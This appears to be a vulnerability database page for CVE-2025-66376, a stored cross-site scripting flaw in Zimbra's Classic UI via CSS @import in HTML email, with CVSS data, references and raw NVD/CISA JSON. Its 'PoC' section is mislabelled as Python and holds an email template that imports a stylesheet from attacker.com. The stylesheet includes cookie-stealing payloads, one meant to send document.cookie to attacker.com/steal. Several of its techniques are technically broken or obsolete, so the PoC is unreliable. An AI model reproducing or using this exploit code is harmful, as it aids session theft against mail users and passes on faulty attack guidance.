CVE-2025-66376

Description

Zimbra Collaboration (ZCS) 10 before 10.0.18 and 10.1 before 10.1.13 allows Classic UI stored XSS via Cascading Style Sheets (CSS) @import directives in an HTML e-mail message.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* - VULNERABLE

ZCS 10.0.x < 10.0.18

ZCS 10.1.x < 10.1.13

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-66376 PoC: Stored XSS via CSS @import in Zimbra Classic UI -->
<!-- Send this HTML email to target Zimbra server -->

<html>
<head>
<style>
@import url('https://attacker.com/malicious.css');
</style>
</head>
<body>
<h1>Test Email</h1>
<p>This email contains malicious CSS import.</p>
</body>
</html>

<!-- On attacker server (malicious.css) -->
/* malicious.css */
body {
  /* IE/Edge expression() XSS payload */
  width: expression(alert(document.cookie));
  /* Alternative payload using CSS parsing */
  background: url('javascript:alert(document.domain)');
}

/* Firefox XBL binding (older versions) */
body {
  -moz-binding: url('https://attacker.com/xbl.xml#xss');
}

/* Modern browser payload using CSS injection */
div::before {
  content: 'PAYLOAD_PLACEHOLDER';
}

/* Bypass technique using @keyframes */
@keyframes xss {
  from { left: 0; }
  to { left: 100%; }
}

/* Trigger JavaScript execution via CSS animation */
input[type="text"]:focus {
  animation: xss 1s infinite;
}

/* Steal session data */
* {
  background-image: url('https://attacker.com/steal?data=' + document.cookie);
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66376
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66376
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66376/
[4] VulDB https://vuldb.com/cve/CVE-2025-66376
[5] https://wiki.zimbra.com/wiki/Security_Center
[6] https://wiki.zimbra.com/wiki/Zimbra_Releases/10.0.18#Security_Fixes
[7] https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.13#Security_Fixes
[8] https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy
[9] https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
[10] https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-66376

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66376", "sourceIdentifier": "[email protected]", "published": "2026-01-05T15:15:44.903", "lastModified": "2026-03-18T20:13:37.087", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zimbra Collaboration (ZCS) 10 before 10.0.18 and 10.1 before 10.1.13 allows Classic UI stored XSS via Cascading Style Sheets (CSS) @import directives in an HTML e-mail message."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "cisaExploitAdd": "2026-03-18", "cisaActionDue": "2026-04-01", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.18", "matchCriteriaId": "7D423DB3-FCD4-445F-A778-BC5F83E01953"}, {"vulnerable": true, "criteria": "cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.0", "versionEndExcluding": "10.1.13", "matchCriteriaId": "7C3F6B1E-1671-461B-A093-7B6854C227FE"}]}]}], "references": [{"url": "https://wiki.zimbra.com/wiki/Security_Center", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/10.0.18#Security_Fixes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.13#Security_Fixes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-66376", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}